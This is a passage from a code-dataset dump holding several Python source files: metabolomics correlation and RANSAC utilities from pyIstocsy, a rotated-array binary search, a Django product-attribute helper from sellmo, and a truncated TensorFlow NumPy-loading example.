in intensity data file, by default these will be replaced with zeros')\n\n\t\t# By default replace with zeros\n\t\tintensityData[np.isnan(intensityData)] = 0\n\n\t# Calculate 'Relative Intensity' for NMR and Targeted feature plotting\n\tif relativeIntensityMetric == 'max':\n\t\tfeatureMetadata['Relative Intensity'] = np.nanmax(intensityData, axis=0)\n\n\telif relativeIntensityMetric == 'median':\n\t\tfeatureMetadata['Relative Intensity'] = np.nanmedian(intensityData, axis=0)\n\t\t\n\telse:\n\t\tfeatureMetadata['Relative Intensity'] = np.nanmean(intensityData, axis=0)\n\n\t# Scale so max value is 1 (if multiple datasets present on different 
scales)\n\tfeatureMetadata['Relative Intensity'] = np.divide(featureMetadata['Relative Intensity'], np.nanmax(featureMetadata['Relative Intensity']))\n\n # Append dataset name to 'Feature Name' for plotting\n\tfeatureMetadata['Feature Name Original'] = featureMetadata['Feature Name']\n\tfeatureMetadata['Feature Name'] = datasetName + '_' + featureMetadata['Feature Name Original']\n\t\n\t# Append dataset name to 'Sample File Name'\n\tsampleMetadata['Sample File Name'] = datasetName + '_' + sampleMetadata['Sample File Name']\n\n\treturn intensityData\t, featureMetadata, sampleMetadata\n\n\ndef _matchDatasets(self, intensityData, featureMetadata, sampleMetadata):\n\t\"\"\" Helper function to match new dataset to existing \"\"\"\n\t\n\t# NOTE: keep ONLY samples that are in all datasets, otherwise correlation structure inaccurate!\n\n\t# Set up new intensityData to be filled\n\tns1, nv1 = self.dataset.intensityData.shape\n\tns2, nv2 = intensityData.shape\n\tintensityDataNew = np.zeros([ns1+ns2, nv1+nv2])\n\tsampleDataIndexIX1 = []\n\tsampleDataIndexIX2 = []\n\tintensityDataIndex = 0\n\n\t# Determine 'Targeted Feature Number' for starting index\n\ttfn_ix = np.max(self.dataset.featureMetadata['Targeted Feature Number']) + 1\n\tif np.isnan(tfn_ix):\n\t\ttfn_ix=0\n\n\t# Update 'Targeted Feature Number' if new dataset is this type\n\tif featureMetadata['Data Type'][0] == 'Targeted':\n\t\tfeatureMetadata['Targeted Feature Number'] = featureMetadata['Targeted Feature Number'] + tfn_ix\n\n\t# Create merged list of all sample IDs\n\tsampleIDs_all = np.unique(self.dataset.sampleMetadata['Sample ID'].append(sampleMetadata['Sample ID']))\n\n\tfor sampleID in sampleIDs_all:\n\t\tix1 = self.dataset.sampleMetadata[sampleID == self.dataset.sampleMetadata['Sample ID']].index\n\t\tix2 = sampleMetadata[sampleID == sampleMetadata['Sample ID']].index\n\n\t\t# If sampleID present in both datasets - match sampleMetadata to existing\n\t\tif (not ix1.empty) & (not ix2.empty):\n\t\t\tintensityDataNew[intensityDataIndex, 0:nv1] = self.dataset.intensityData[ix1, :]\n\t\t\tintensityDataNew[intensityDataIndex, nv1:nv1+nv2] = intensityData[ix2, :]\n\t\t\tsampleDataIndexIX1.append(ix1[0])\n\t\t\tsampleDataIndexIX2.append(ix2[0])\n\t\t\tintensityDataIndex = intensityDataIndex + 1\n\n\t# Sort new sampleMetadata\n\tself.dataset.sampleMetadata = self.dataset.sampleMetadata.loc[sampleDataIndexIX1,:]\n\tself.dataset.sampleMetadata.reset_index(drop=True, inplace=True)\n\tsampleMetadata = sampleMetadata.loc[sampleDataIndexIX2,:]\n\tsampleMetadata.reset_index(drop=True, inplace=True)\n\tself.dataset.sampleMetadata['Sample File Name'] = self.dataset.sampleMetadata['Sample File Name'] + ';' + sampleMetadata['Sample File Name']\n\n\t# Append new featureMetadata\n\tself.dataset.featureMetadata = self.dataset.featureMetadata.append(featureMetadata, sort=False)\n\tself.dataset.featureMetadata.reset_index(drop=True, inplace=True)\n\n\t# Overwrite intensityData\n\tself.dataset.intensityData = intensityDataNew[0:intensityDataIndex,:]#nsIX,:]\n\n\t# TODO sort NMR so ppm ascending?\n\n\treturn (self)\n\n\ndef _deleteDataset(self, datasetToDelete):\n\t\"\"\" Delete existing dataset \"\"\"\n\t\n\t# Find features corresponding to dataset\n\tfeatureMask = self.dataset.featureMetadata['Dataset Name'] == datasetToDelete\n\t\n\t# Find samples corresponding to dataset (matches datasetToDelete name in 'Sample File Name' column)\n\tallSamples = self.dataset.sampleMetadata['Sample File Name'].str.split(\";\", expand=True)\n\tsampleMask = []\n\t\n\tfor col 
in allSamples.columns:\n\t\tif allSamples.loc[0, col].startswith(datasetToDelete):\n\t\t\tsampleMask.append(col)\n\n\tallSamples.drop(columns=sampleMask, inplace=True)\t\n\t\n\t# If no samples or feature remain, reset dataset\n\tif (sum(featureMask)==len(featureMask) and allSamples.shape[1]==0):\n\t\t\n\t\t# Delete dataset\n\t\tdel(self.dataset)\n\t\t\n\t\t# Reset Attributes['istocsyDatasetDetails']\n\t\tself.Attributes['istocsyDatasetDetails'] = [None] * 2\n\t\t\n\telse:\n\t\t\n\t\t# Remove features from intensityData\n\t\tself.dataset.intensityData = self.dataset.intensityData[:,~featureMask.values]\t\t\n\t\t\t\n\t\t# Remove features from featureMetadata\n\t\tself.dataset.featureMetadata = self.dataset.featureMetadata.loc[~featureMask.values]\n\t\tself.dataset.featureMetadata.reset_index(drop=True, inplace=True)\n\t\n\t\t# Remove sample names from sampleMetadata\n\t\tself.dataset.sampleMetadata['Sample File Name'] = allSamples[allSamples.columns].apply(lambda row: '; '.join(row.values.astype(str)), axis=1)\n\n\t\t# Update numbers in Attributes['istocsyDatasetDetails']\n\t\tself.Attributes['istocsyDatasetDetails'][0], self.Attributes['istocsyDatasetDetails'][1] = self.dataset.intensityData.shape\t\n\t\t\t\t\n\t# Update Attributes['datasetsDetails']\n\tself.Attributes['datasetsDetails'] = [i for i in self.Attributes['datasetsDetails'] if i[0] != datasetToDelete]\n\n\ndef _loadAnnotations(self):\n\t\"\"\" Load annotations csv file \"\"\"\n\n\t# Check input\n\tif (self.Attributes['annotationFilePath'] is None):\n\t\traise TypeError('Annotation file path must be set')\n\n\t# Import annotation file\n\tannotationData = pandas.read_csv(self.Attributes['annotationFilePath'], index_col=False)\n\n\t# Either create or append to existing data\n\tif not hasattr(self, 'annotationData'):\n\n\t\tself.annotationData = pandas.DataFrame(None, columns=['Annotation', 'Retention Time', 'm/z', 'ppm'])\n\n\tself.annotationData = self.annotationData.append(annotationData, sort=False)\n\n\tself.annotationData.reset_index(drop=True, inplace=True)\n\n\t# Ensure columns set to right data type\n\ttry:\n\t\tself.annotationData['Annotation'] = self.annotationData['Annotation'].astype(str)\n\t\tself.annotationData['ppm'] = self.annotationData['ppm'].astype(np.float64)\n\t\tself.annotationData['Retention Time'] = self.annotationData['Retention Time'].astype(np.float64)\n\t\tself.annotationData['m/z'] = self.annotationData['m/z'].astype(np.float64)\n\n\texcept:\n\n\t\traise ValueError('ALERT: please check fields in ' + self.Attributes['annotationDataFile'])\n\t\t_displayMessage('ALERT: please check fields in ' + self.Attributes['annotationDataFile'])\n\n\ndef _matchAnnotations(self):\n\t\"\"\" Match annotations csv file to data \"\"\"\n\n\t# TODO do not match to targeted data? 
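(open question)\n\t# Hedged aside (numeric illustration, not in the original): the LC-MS match below\n\t# uses a relative ppm window,\n\t# ppm_diff = abs(mz_feature - mz_annotation) / mz_annotation * 1e6\n\t# so an assumed mzThreshold of 5 ppm tolerates about +/- 0.0025 at m/z 500.\n\t# 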
Although OK for now, validation stages!\n\n\t# Do not run match to annotation file again if already matched\n\tmask = self.dataset.featureMetadata['Feature Name'].str.contains(\"_annotationMatch_\")\n\n\tfor i in range(self.annotationData.shape[0]):\n\n\t\t# LC-MS annotation\n\t\tif np.isfinite(self.annotationData.loc[i, 'Retention Time']):\n\n\t\t\ttemp = (self.dataset.featureMetadata.loc[~mask, 'Retention Time'] >= self.annotationData.loc[i, 'Retention Time'] - self.Attributes['rtThreshold']) & (self.dataset.featureMetadata.loc[~mask, 'Retention Time'] <= self.annotationData.loc[i, 'Retention Time'] + self.Attributes['rtThreshold']) & (np.multiply(np.divide(np.abs(self.dataset.featureMetadata.loc[~mask, 'm/z'] - self.annotationData.loc[i, 'm/z']), self.annotationData.loc[i, 'm/z']), 1000000) <= self.Attributes['mzThreshold'])\n\n\t\t# NMR annotation\n\t\telse:\n\n\t\t\ttemp = (self.dataset.featureMetadata.loc[~mask, 'ppm'] >= self.annotationData.loc[i, 'ppm'] - self.Attributes['ppmThreshold']) & (self.dataset.featureMetadata.loc[~mask, 'ppm'] <= self.annotationData.loc[i, 'ppm'] + self.Attributes['ppmThreshold'])\n\n\t\t# Append feature name with annotataion match\n\t\tif (sum(temp)>=1):\n\t\t\ttemp = temp.index[temp==True]\n\t\t\tself.dataset.featureMetadata.loc[temp, 'Feature Name'] = self.dataset.featureMetadata.loc[temp, 'Feature Name'] + '_annotationMatch_' + self.annotationData.loc[i, 'Annotation']\n\n\ndef _findNearest(featureMetadata, Xon, Yon, Xvalue, Yvalue):\n\t\"\"\" Find the nearest point under the click\n\n\t:param pandas.dataFrame featureMetadata: feature metadata, must contain 'Retention Time' and 'm/z' columns\n\t:param float Xvalue: x axis value of point\n\t:param float Yvalue: y axis value of point\n\t\"\"\"\n\n\txtol = np.sort(featureMetadata[Xon])\n\txtol = np.median(np.sort(xtol))\n\tytol = np.sort(featureMetadata[Yon])\n\tytol = np.median(np.sort(ytol))\n\tx = 0\n\ty = 0\n\n\ttemp = (featureMetadata[Xon] >= Xvalue - x) & (featureMetadata[Xon] <= Xvalue + x) & (featureMetadata[Yon] >= Yvalue - y) & (featureMetadata[Yon] <= Yvalue + y)\n\n\twhile sum(temp==True) == 0:\n\n\t\tx = x + xtol\n\t\ty = y + ytol\n\n\t\ttemp = (featureMetadata[Xon] >= Xvalue - x) & (featureMetadata[Xon] <= Xvalue + x) & (featureMetadata[Yon] >= Yvalue - y) & (featureMetadata[Yon] <= Yvalue + y)\n\n\ttest = featureMetadata.index[temp].values\n\n\treturn test[0]\n\n\ndef _applySampleMask(self, applyMask, threshold=None):\n \"\"\"\n Returns sampleMask - mask of which samples correlation values should be calculated on\n\n Any samples with intensity < threshold will be masked\n \"\"\"\n\n if applyMask == \"All samples\":\n\n sampleMask = True\n\n else:\n\n # Extract driver peak intensity values for all samples\n xVals = self.dataset.intensityData[:,self.Attributes['driver']]\n\n # Calculate relative values\n xVals = xVals/np.nanmax(xVals)\n\n # SampleMask is false for any samples with intensity < threshold\n sampleMask = xVals >= threshold\n\n return sampleMask\n\n\ndef _calcCorrelation(X, driverIX=None, correlationMethod='pearson', sampleMask=None):\n\t\"\"\"\n\tCalculates the specified correlation and correction for multiple tests (if required)\n\n\tCode from:\n\t\tscipy.stats import pearsonr, spearmanr, kendalltau\n\t\tstatsmodels.stats.multitest import multipletests\n\n\tSee relevant documentation for details of allowed methods (listed in drop down menu in ISTOCSY app)\n\n\t:param numpy.ndarray X: intensity data for all features to calculate correlation to\n\t:param numpy.ndarray Y: intensity 
data for driver feature\n\t:param str correlationMethod: correlation method, one of 'pearson', 'spearman', 'kendalltau'\n\t\"\"\"\n\n\tif driverIX is not None:\n\n\t\t# Apply sampleMask if required\n\t\tif sampleMask is not None:\n\t\t\tX=X[sampleMask,:]\n\n\t\t# Fastest correlation method\n\t\tcVect = np.zeros(X.shape[1])\n\n\t\tif correlationMethod == 'pearson':\n\t\t\tfor col in np.arange(X.shape[1]):\n\t\t\t\tcVect[col], pVal = pearsonr(X[:,col], X[:,driverIX])\n\n\t\telif correlationMethod == 'spearman':\n\t\t\tfor col in np.arange(X.shape[1]):\n\t\t\t\tcVect[col], pVal = spearmanr(X[:,col], X[:,driverIX])\n\n\t\telse:\n\t\t\tfor col in np.arange(X.shape[1]):\n\t\t\t\tcVect[col], pVal = kendalltau(X[:,col], X[:,driverIX])\n\n\telse:\n\n\t\tcVect = np.zeros([X.shape[1], X.shape[1]])\n\n\t\tif correlationMethod == 'pearson':\n\t\t\tfor col in range(X.shape[1]):\n\t\t\t\tfor col2 in range(col, X.shape[1]):\n\t\t\t\t\tcVal, pVal = pearsonr(X[:,col], X[:,col2])\n\t\t\t\t\tcVect[col,col2] = cVal\n\t\t\t\t\tcVect[col2,col] = cVal\n\n\t\telif correlationMethod == 'spearman':\n\t\t\tfor col in range(X.shape[1]):\n\t\t\t\tfor col2 in range(col, X.shape[1]):\n\t\t\t\t\tcVal, pVal = spearmanr(X[:,col], X[:,col2])\n\t\t\t\t\tcVect[col,col2] = cVal\n\t\t\t\t\tcVect[col2,col] = cVal\n\n\t\telse:\n\t\t\tfor col in range(X.shape[1]):\n\t\t\t\tfor col2 in range(col, X.shape[1]):\n\t\t\t\t\tcVal, pVal = kendalltau(X[:,col], X[:,col2])\n\t\t\t\t\tcVect[col,col2] = cVal\n\t\t\t\t\tcVect[col2,col] = cVal\n\n\t# Convert nan values to zero\n\tcVect[np.isnan(cVect)] = 0\n\n\treturn cVect\n\ndef _dropStructuralSetInfo(self):\n\t\"\"\" Delete any exisiting structural set info \"\"\"\n\t\n\ttry:\n\t\tself.dataset.featureMetadata.drop(columns=['Set', 'SortedIX', 'Average Set Correlation'], inplace=True)\n\texcept:\n\t\tpass\n\n\ndef _findStructuralSets(self):\n\t\"\"\"\n\tFinds sets of features in featureTable which are resulting from the same compound (in theory!)\n\n\tFeatures in the same structural set are defined as those which:\n\t\t- correlate with >= attributes['structuralThreshold']\n\t\t- are within a defined retention time window (attributes['rtThreshold'])\n\n\tClusters are defined using networkx\n\n\t:param pandas.dataFrame featureTable feature metadata, must contain 'Retention Time', and 'Correlation' columns\n\t:param numpy.ndarray intensityData: intensity data for all features in featureTable\n\t:param int driverIX: index of driver feature\n\t:param dictionary attributes: settings, must contain 'structuralThreshold', 'rtThreshold', 'correlationMethod'\n\t\"\"\"\n\n\t# Delete columns from existing featureMetadata if has been run previously\n\t_dropStructuralSetInfo(self)\n\n\t# Extract features above correlation threshold only\n\tfeatureTable = self.dataset.featureMetadata[self.dataset.featureMetadata['Feature Mask']].copy()\n\n\t# Return correlation between all features above threshold\n\tC = _calcCorrelation(self.dataset.intensityData[:,self.dataset.featureMetadata['Feature Mask']], correlationMethod=self.Attributes['correlationMethod'])\n\n\t# Calculate difference in RT\n\tRT = np.expand_dims(featureTable['Retention Time'].values, axis=1)\n\tRT = np.tile(RT, featureTable.shape[0])\n\tR = np.abs(RT - np.transpose(RT))\n\n\t# Set R to zero for NMR/Targeted features\n\tR[np.isnan(R)] = 0\n\n\t# Boolean matrices for correlation and RT passing thresholds\n\tCpass = C >= self.Attributes['structuralThreshold']\n\tRpass = R <= self.Attributes['rtThreshold']\n\n\t# Feature connections passing both 
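checks:\n\t# Hedged aside (toy illustration of the networkx clustering used below):\n\t# G = nx.from_numpy_matrix(np.array([[0, 1, 0], [1, 0, 0], [0, 0, 0]]))\n\t# list(nx.connected_components(G)) # -> [{0, 1}, {2}]\n\t# i.e. an edge joins two features whose pair passes both the correlation and RT 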
threshold\n\tO = Cpass & Rpass\n\n\t# Cluster\n\tG = nx.from_numpy_matrix(O)\n\ttemp = list(nx.connected_components(G))\n\n\t# Extract unique sets from clustering network\n\tsetix = 1\n\tfor i in np.arange(len(temp)):\n\t\tfor j in np.arange(featureTable.shape[0]):\n\t\t\tif j in temp[i]:\n\t\t\t\tfeatureTable.loc[featureTable.index[j], 'Set'] = setix\n\t\tsetix = setix+1\n\n\t# Set as int\n\tfeatureTable['Set'] = featureTable['Set'].astype(int)\n\n\t# Driver should be in Set 1\n\tdriverSet = featureTable.loc[self.Attributes['driver'], 'Set']\n\tswitchD = featureTable['Set'] == driverSet\n\tfeatureTable.loc[featureTable.index[featureTable['Set'] == 1], 'Set'] = driverSet\n\tfeatureTable.loc[featureTable.index[switchD==True], 'Set'] = 1\n\n\t# Sort by average correlation to driver, then by RT\n\tsets = np.unique(featureTable['Set'])\n\n\tfor i in sets:\n\t\tsetAv = np.mean(featureTable.loc[featureTable['Set']==i, 'Correlation'])\n\t\tfeatureTable.loc[featureTable['Set']==i, 'Average Set Correlation'] = setAv\n\n#\tfeatureTable.sort_values(['Average Set Correlation','Retention Time'], ascending=[False, True], inplace=True)\n\tfeatureTable.sort_values(['Set','Retention Time'], ascending=[True, True], inplace=True)\n\n\t# Add index for plotting\n\tfeatureTable['SortedIX'] = np.arange(featureTable.shape[0])\n\n\t# save results to featureMetadata table\n\tself.dataset.featureMetadata = self.dataset.featureMetadata.merge(featureTable[['Set', 'SortedIX', 'Average Set Correlation']], how='left', left_index=True, right_index=True)\n\n\ndef _displayMessage(messageText):\n\t\"\"\"\n\tCreates a message box containing messageText\n\n\t:param str messageText: text for display\n\t\"\"\"\n\n\tmessage = QMessageBox()\n\tmessage.setText(messageText)\n\tmessage.exec_()\n\n\ndef _writeOutput(self, mask, unittest=False):\n\t\"\"\" Export correlated feature list to csv with screenshot of app \"\"\"\n\n\tfeatureMetadata = self.dataset.featureMetadata.copy()\n\tsavePath = os.path.join(self.Attributes['saveDir'], self.Attributes['saveName'])\n\n\tif mask is not None:\n\t\tfeatureMetadata = featureMetadata.loc[mask,:]\n\telse:\n\t\tsavePath = savePath + '_allFeatures'\n\n\t# Save output\n\tfeatureMetadata.to_csv(savePath + '.csv', encoding='utf-8')\n\n\t# Save screen shot of app (falls over in testing so only when running for real)\n\tif unittest is False:\n\t\tprinter = QPrinter(QPrinter.HighResolution)\n\t\tprinter.setOutputFileName(savePath + '_screenshot.pdf')\n\t\tprinter.setOutputFormat(QPrinter.PdfFormat)\n\t\tsize = self.size()\n\t\tprinter.setPaperSize(QSizeF(size.width(), size.height()), QPrinter.DevicePixel) # QPrinter.DevicePixel\n\t\tprinter.setFullPage(True)\n\t\tself.render(printer)\n\n\t# Export RANSAC outliers\n\tif hasattr(self, 'RANSAC'):\n\n\t\tself.RANSAC['outliers'].to_csv(savePath.replace('_allFeatures', '') + '_RANSACoutliers.csv', encoding='utf-8')\n\n\ndef _writeData(self):\n\t\"\"\" Export full ISTOCSY dataset \"\"\"\n\n\t# Export intensity data\n\tnp.savetxt(os.path.join(self.Attributes['saveDir'], 'ISTOCSY_dataset_intensityData.csv'), self.dataset.intensityData, delimiter=\",\")\n\n\t# Export sample metadata\n\tsampleMetadata = self.dataset.sampleMetadata.copy()\n\ttry:\n\t\tcolumnsToRemove = ['Sample Mask']\n\t\tsampleMetadata.drop(columnsToRemove, axis=1, inplace=True)\n\texcept:\n\t\tpass\n\n\tsampleMetadata.to_csv(os.path.join(self.Attributes['saveDir'], 'ISTOCSY_dataset_sampleMetadata.csv'), encoding='utf-8')\n\n\t# Export feature metadata (removing feature correlation specific 
info)\n\tfeatureMetadata = self.dataset.featureMetadata.copy()\n\ttry:\n\t\tcolumnsToRemove = ['Correlation', 'Feature Mask', 'Set', 'SortedIX', 'Average Set Correlation']\n\t\tfeatureMetadata.drop(columnsToRemove, axis=1, inplace=True)\n\texcept:\n\t\tpass\n\n\tfeatureMetadata.to_csv(os.path.join(self.Attributes['saveDir'], 'ISTOCSY_dataset_featureMetadata.csv'), encoding='utf-8')\n\n\ndef _loadBatchFile(self):\n\t\"\"\" Load batch file \"\"\"\n\n\t# Check input\n\tif (self.Attributes['batchFilePath'] is None):\n\t\traise TypeError('Batch file path must be set')\n\n\tself.batchData = pandas.read_csv(self.Attributes['batchFilePath'], index_col=False)#index_col=0)\n\n\t# Ensure columns set to right data type\n\ttry:\n\t\tself.batchData['Drivers'] = self.batchData['Driver'].astype(str)\n\n\texcept:\n\n\t\traise ValueError('ALERT: ' + self.Attributes['batchFilePath'] + ' must contain \"Driver\" field')\n\t\t_displayMessage('ALERT: ' + self.Attributes['batchFilePath'] + ' must contain \"Driver\" field')\n\n\ndef _fitRANSAC(driverIntensity, driverPairIntensity, degree=1):\n\t\"\"\" Fits RANSAC between two sets of intensity values - returns fit, outliers, parameters \"\"\"\n\n\t# Fit RANSAC\n\txcubic = PolynomialFeatures(degree=degree, include_bias=True)\n\n\txdata = xcubic.fit_transform(driverIntensity.reshape(-1, 1))\n\n\transac = RANSACRegressor(LinearRegression())\n\n\transac.fit(xdata, driverPairIntensity)\n\n\transacLine = (ransac.predict(xcubic.fit_transform(driverIntensity.reshape(-1, 1)))).squeeze()\n\n\transacInliers = ransac.inlier_mask_\n\n\transacPlotOrder = np.argsort(driverIntensity)\n \n # CAZ check this\n\n\t# Calculate the devaition from regression at each point\n\tdeviation = np.sqrt((driverPairIntensity - (ransac.estimator_.coef_[1] * driverIntensity + ransac.estimator_.intercept_))**2)\n\n\t# Extract parameters intercept | slope | SSE\n\transacParams = [ransac.estimator_.intercept_, ransac.estimator_.coef_[1], sum(deviation)]\n\n\treturn ransacLine, ransacInliers, ransacPlotOrder, ransacParams\n\n\ndef _applyFitRANSAC(self):\n\t\"\"\" Applys _fitRANSAC between driver and all features correlating above threshold with driver \"\"\"\n\n\t# Extract feature metadata for features passing correlation\n\ttempTable = self.dataset.featureMetadata.loc[self.dataset.featureMetadata['Feature Mask'],:].copy()\n\n # Plot only non masked samples\n\tintensityData = self.dataset.intensityData[self.dataset.sampleMetadata['Sample Mask'],:]\n\tsampleMetadata = self.dataset.sampleMetadata.loc[self.dataset.sampleMetadata['Sample Mask'],:].copy()\n\n\t# Set up\n\tnv = tempTable.shape[0]\n\toutliers = sampleMetadata[['Sample ID', 'Sample File Name']].copy()\n\tlineFit = sampleMetadata[['Sample ID', 'Sample File Name']].copy()\n\tplotOrder = sampleMetadata[['Sample ID', 'Sample File Name']].copy()\n\n\t# Generate data for each feature\n\tfor i in np.arange(nv):\n\n\t\tif tempTable.index[i] == self.Attributes['driver']:\n\t\t\tcontinue\n\n\t\tfeaturePairName = self.dataset.featureMetadata.loc[tempTable.index[i], 'Feature Name']\n\n\t\txVals = intensityData[:, tempTable.index[i]]\n\t\txVals = xVals/np.nanmax(xVals)\n\n\t\tyVals = intensityData[:, self.Attributes['driver']]\n\t\tyVals = yVals/np.nanmax(yVals)\n\n\t\t# fit RANSAC\n\t\transacLine, ransacInliers, ransacPlotOrder, ransacParams = _fitRANSAC(xVals, yVals, self.Attributes['RANSACdegree'])\n\n # Save outliers\n\t\toutliers.loc[:, featurePairName] = ~ransacInliers\n\t\tlineFit.loc[:, featurePairName] = ransacLine\n\t\tplotOrder.loc[:, 
featurePairName] = ransacPlotOrder\n\n\t\tself.dataset.featureMetadata.loc[tempTable.index[i], 'RANSAC Intercept'] = ransacParams[0]\n\t\tself.dataset.featureMetadata.loc[tempTable.index[i], 'RANSAC Slope'] = ransacParams[1]\n\t\tself.dataset.featureMetadata.loc[tempTable.index[i], 'RANSAC SSE'] = ransacParams[2]\n\n\tself.RANSAC = {\n 'outliers': outliers,\n 'lineFit': lineFit,\n 'plotOrder': plotOrder,\n }\n","sub_path":"pyIstocsy/_utilities.py","file_name":"_utilities.py","file_ext":"py","file_size_in_byte":25787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"353769317","text":"# O(log n) time\n# O(1) space\ndef shiftedBinarySearch(array, target):\n start = 0\n end = len(array) - 1\n mid = (start+end)//2\n while(start <= end):\n if array[mid] == target:\n return mid\n if array[start] <= array[mid]:\n if target < array[mid] and target >= array[start]:\n end = mid-1\n else:\n start=mid+1\n else:\n if target > array[mid] and target <= array[end]:\n start = mid+1\n else:\n end=mid-1\n mid = (start+end)//2\n return -1\n\nprint(shiftedBinarySearch([45,61,71,72,73,0,1,33],33), end='')","sub_path":"AlgoExpert/shiftedSearch.py","file_name":"shiftedSearch.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"3727118","text":"# Copyright (c) 2014, Adaptiv Design\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n\n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n\n# 2. Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n\n# 3. Neither the name of the copyright holder nor the names of its contributors\n# may be used to endorse or promote products derived from this software without\n# specific prior written permission.\n\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\nfrom collections import OrderedDict\n\nfrom django.db import models\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.utils.encoding import smart_text\nfrom django.utils.text import capfirst\nfrom django.utils import six\n\nimport sellmo.contrib.attribute as _attribute\n\nNO_DEFAULT = object()\n\n\nclass AttributeHelper(object):\n def __init__(self):\n self._values = OrderedDict()\n # Serves as a shortcut, can be populated from an index for example\n self._raw_values = {}\n self._attributes = {}\n self._populated = False\n\n def get_values_queryset(self):\n raise NotImplementedError()\n\n def get_new_value(self):\n raise NotImplementedError()\n\n def get_attribute(self, key):\n if key not in self._attributes and not self._populated:\n try:\n attribute = _attribute.models.Attribute.objects.get(key=key)\n self._attributes[key] = attribute\n except _attribute.models.Attribute.DoesNotExist:\n pass\n\n return self._attributes.get(key)\n\n def get_own_value(self, key):\n if key not in self._values and not self._populated:\n try:\n value = self.get_values_queryset().get(\n attribute=self.get_attribute(key)\n )\n self._values[key] = value\n\n # Remove from raw values !\n if key in self._raw_values:\n del self._raw_values[key]\n except _attribute.models.Value.DoesNotExist:\n pass\n\n return self._values.get(key, None)\n\n def get_value(self, key):\n return self.get_own_value(key)\n\n def get_values(self):\n self.populate()\n return list(six.itervalues(self._values))\n\n def get_value_value(self, key):\n if key in self._raw_values:\n return self._raw_values[key]\n\n value = self.get_value(key)\n if value is None:\n raise KeyError(key)\n return value.value\n\n def set_value_value(self, key, value_value):\n value = self.get_own_value(key)\n if value is None:\n value = self.get_new_value()\n value.attribute = self.get_attribute(key)\n self._values[key] = value\n\n # Remove from indexed values !\n if key in self._raw_values:\n del self._raw_values[key]\n\n value.value = value_value\n\n def populate_raw_values(self, raw_values):\n self._raw_values = dict(**raw_values)\n\n def populate(self, values=None):\n if self._populated:\n return\n\n if values is None:\n values = self.get_values_queryset()\n # We'll be accessing attribute\n values = values.select_related('attribute')\n\n for value in values:\n attribute = value.attribute\n self._attributes[attribute.key] = attribute\n if not self._values.has_key(attribute.key):\n self._values[attribute.key] = value\n\n self._populated = True\n\n def get(self, key, default=NO_DEFAULT):\n try:\n return self[key]\n except KeyError:\n if default is not NO_DEFAULT:\n return default\n raise\n\n def __getitem__(self, key):\n key = self._get_key(key)\n return self.get_value_value(key)\n\n def __setitem__(self, key, value):\n key = self._get_key(key)\n self.set_value_value(key, value)\n\n def __contains__(self, key):\n key = self._get_key(key)\n return self.get_value(key) is 
not None\n\n def _get_key(self, key_or_attribute):\n key = key_or_attribute\n if isinstance(key_or_attribute, _attribute.models.Attribute):\n key = key_or_attribute.key\n return key\n\n def __iter__(self):\n for value in self.get_values():\n if not value.is_empty():\n yield value\n\n def __len__(self):\n return len(\n [\n value for value in self.get_values() if not value.is_empty()\n ]\n )\n\n def save_or_delete_values(self):\n for value in six.itervalues(self._values):\n self.save_or_delete_value(value)\n\n def save_or_delete_value(self, value):\n value.save_or_delete_value()\n\n\nclass ProductAttributeHelper(AttributeHelper):\n def __init__(self, product):\n super(ProductAttributeHelper, self).__init__()\n self._product = product\n\n def get_values_queryset(self):\n if self._product.pk is not None:\n return self._product.values.all()\n else:\n return _attribute.models.Value.objects.none()\n\n def get_new_value(self):\n if self._product.pk is not None:\n return _attribute.models.Value(product=self._product)\n else:\n return _attribute.models.Value()\n\n def save_or_delete_value(self, value):\n value.product = self._product\n value.save_or_delete_value()\n","sub_path":"sellmo/contrib/attribute/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":6553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"192796775","text":"import numpy as np\nimport tensorflow as tf\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\n# 1.consume numpy arrays\n# Load the training data into two NumPy arrays, for example using `np.load()`.\nwith np.load(\"/var/data/training_data.npy\") as data:\n features = data[\"features\"]\n labels = data[\"labels\"]\n# Assume that each row of `features` corresponds to the same row as `labels`.\nassert features.shape[0] == labels.shape[0]\ndataset = tf.data.Dataset.from_tensor_slices((features, labels))\nsess = tf.Session()\n\n\n# 2.feed the NumPy arrays when initialize an Iterator over the dataset\nwith np.load(\"/var/data/training_data.npy\") as data:\n features = data[\"features\"]\n labels = data[\"labels\"]\n# Assume that each row of `features` corresponds to the same row as `labels`.\nassert features.shape[0] == labels.shape[0]\nfeatures_placeholder = tf.placeholder(features.dtype, features.shape)\nlabels_placeholder = tf.placeholder(labels.dtype, labels.shape)\n\ndataset = tf.data.Dataset.from_tensor_slices((features_placeholder, labels_placeholder))\n# [Other transformations on `dataset`...]\ndataset = ...\niterator = dataset.make_initializable_iterator()\nsess.run(iterator.initializer, feed_dict={features_placeholder: features,\n 